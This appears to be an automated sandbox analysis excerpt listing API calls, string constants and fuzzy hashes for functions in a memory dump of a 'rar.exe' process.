                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 502429940-0
                                                            • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                            • Instruction ID: 64072edfa29a39fc01b2e60a0dd9e5487528558753a3c87208263efe03b839ce
                                                            • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                            • Instruction Fuzzy Hash: 5011A032A08E90D6E214AB20E5446A9E331FB89BA0F400231DBAD136A5DF39E46CCB00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: gfffffff
                                                            • API String ID: 3215553584-1523873471
                                                            • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                            • Instruction ID: 44bb396ce3ad0900293e88e4654be76fd2fced35b886cceb3e34841bb254c550
                                                            • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                            • Instruction Fuzzy Hash: 87912673B0DB8786EB119F299180368EB65AB25BE0F488135CA8D073D5EA3CF119CB11
                                                            APIs
                                                              • Part of subcall function 00007FF71D2FB6D0: Sleep.KERNEL32(?,?,?,?,00007FF71D2CCBED,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2FB730
                                                            • new.LIBCMT ref: 00007FF71D2ECFD9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: rar$rev
                                                            • API String ID: 3472027048-2145959568
                                                            • Opcode ID: 577253b60d49c6aa0442356c4acb2227b4df70f545d38a99e4159d429305e638
                                                            • Instruction ID: 5416f14a01bd0e0a474e5a48568c41950fabbba13d5ad5eadc99b241de5e716f
                                                            • Opcode Fuzzy Hash: 577253b60d49c6aa0442356c4acb2227b4df70f545d38a99e4159d429305e638
                                                            • Instruction Fuzzy Hash: 92A1B122A0CA5281EB24FB28C4542BDE365FF487A4FD54031DA6D5B6C6FE6CE548CB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: *
                                                            • API String ID: 3215553584-163128923
                                                            • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                            • Instruction ID: 5e61fe99aed2b958024ed534468a4a95276c9c6510a8e65aa93a173959f37844
                                                            • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                            • Instruction Fuzzy Hash: FA714F7390CA12C6E764AF29804517CFBA0FB45F6CFA4113ADA4A42294EF39D489CB65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: e+000$gfff
                                                            • API String ID: 3215553584-3030954782
                                                            • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                            • Instruction ID: e673519144e54d64d686e1e6c46c4bcfc289408c3800b8d3ff5ef39e902de415
                                                            • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                            • Instruction Fuzzy Hash: A9510C72B1CBC286E7259B359841369FB91E741BA0F4C9239C69C47BD5EF2CE4488B20
                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF71D2D475B,?,00000000,?,?,00007FF71D2D4620,?,00000000,?), ref: 00007FF71D2E4633
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 1611563598-253988292
                                                            • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                            • Instruction ID: 2cebc63cea386cb66dc18830dae62edcb5e4f40d8fb6cfbf92afe845af54cc30
                                                            • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                            • Instruction Fuzzy Hash: FA419311E0CE8280E920BB51E5011FAE351AF497E4FC18631DD7E576D6FE2CE64ECA20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe
                                                            • API String ID: 3307058713-3210298981
                                                            • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                            • Instruction ID: ddd4190e7ac180633b27579221190852f30c5a95d705a27ee8b0ea6c284ff07a
                                                            • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                            • Instruction Fuzzy Hash: F8416D36A0CE53C5EB54BF25A4400B8FBA4EB44BA4B954039E94E47B95FF3DE449CB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AttributesFilewcsstr
                                                            • String ID: System Volume Information\
                                                            • API String ID: 1592324571-4227249723
                                                            • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                            • Instruction ID: 28f3dca1aabeb028de7fe71211a687d9c38cc641647050afececa9b38f1cd896
                                                            • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                            • Instruction Fuzzy Hash: BA312321A1DE8185FF50BB21A1502FAE761AF45BE0FC44430DEAC07796EE3DE04A8B20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: LoadString$fflushswprintf
                                                            • String ID: %d.%02d$[
                                                            • API String ID: 1946543793-195111373
                                                            • Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                            • Instruction ID: dd1c3341f034a5b4687cc6b8ee006cc1511896499905c5ff61d285712a21897d
                                                            • Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                            • Instruction Fuzzy Hash: 0D316D21A1DD8291EA60BB10E4153FAE350AF84764FC44539D69D0B6C6FF6CE949CF60
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: snprintf
                                                            • String ID: $%s$@%s
                                                            • API String ID: 4288800496-834177443
                                                            • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                            • Instruction ID: 8b64ef0ace3da674ab6fe3d35c1a79d980cd11bbfc86f588e7d3126ef7eabd32
                                                            • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                            • Instruction Fuzzy Hash: F731BF72A0DE8295EA10AB19E4407EAA360FB447A4F800436EE5D17B59FF3DE50DCB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: fixed%u.$fixed.
                                                            • API String ID: 233258989-2525383582
                                                            • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                            • Instruction ID: 2a6305fcf2607b0ee875e4c4de51381e045a65214c87b52dcfb15d654de1843f
                                                            • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                            • Instruction Fuzzy Hash: 7631A823A0CE8191E620AB15E4017EAE360FB557A0FD04236EA5D176DAEF3CD54ACF20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: LoadString
                                                            • String ID: Adding %-58s
                                                            • API String ID: 2948472770-2059140559
                                                            • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                            • Instruction ID: 0470aae481fdf52a849e309c9b961ec4a75e47343b57216f045859d54e6cb1ab
                                                            • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                            • Instruction Fuzzy Hash: 5F114972B1CF41C5EA10AF56AC440A9F7A1BB98FD4B948439CE1C93324FF7CE50A8A54
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: ;%%0%du
                                                            • API String ID: 233258989-2249936285
                                                            • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                            • Instruction ID: 7d43370ee86065d88c36b9e61e70c0c70f5aa0cab77fbf317800a9a58a4468a4
                                                            • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                            • Instruction Fuzzy Hash: FB11B632A0CA8182E720AB24E0103EAB360FB88754F844131DB8D07795EE7CE54DCF50
                                                            APIs
                                                              • Part of subcall function 00007FF71D2E42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF71D2E430F
                                                            • GetVolumeInformationW.KERNEL32(?,00007FF71D2D0BED,?,?,00000000,?,?,00007FF71D2CF30F,00000000,00007FF71D2B6380,?,00007FF71D2B2EC8), ref: 00007FF71D2D337E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: InformationVolumeswprintf
                                                            • String ID: FAT$FAT32
                                                            • API String ID: 989755765-1174603449
                                                            • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                            • Instruction ID: 1880f051f5ae1613de243d5113bbb8a39fb3a7f4197e5524f1ff684751da8a03
                                                            • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                            • Instruction Fuzzy Hash: 59114232A1CE4281F760AB50E8912E6E355FB94354FC45135E98D82A95FF3CE11DCF24
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 564652978-2248577382
                                                            • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                            • Instruction ID: 0e80b1bcc96b86953e7d3a7e77f03b6266431c77517f088ea868eeb230d1227f
                                                            • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                            • Instruction Fuzzy Hash: EEE0E531E0CC0292EA40B725AC850A5E251AF547B4FD04335D43E421E1FF2CA94E9B21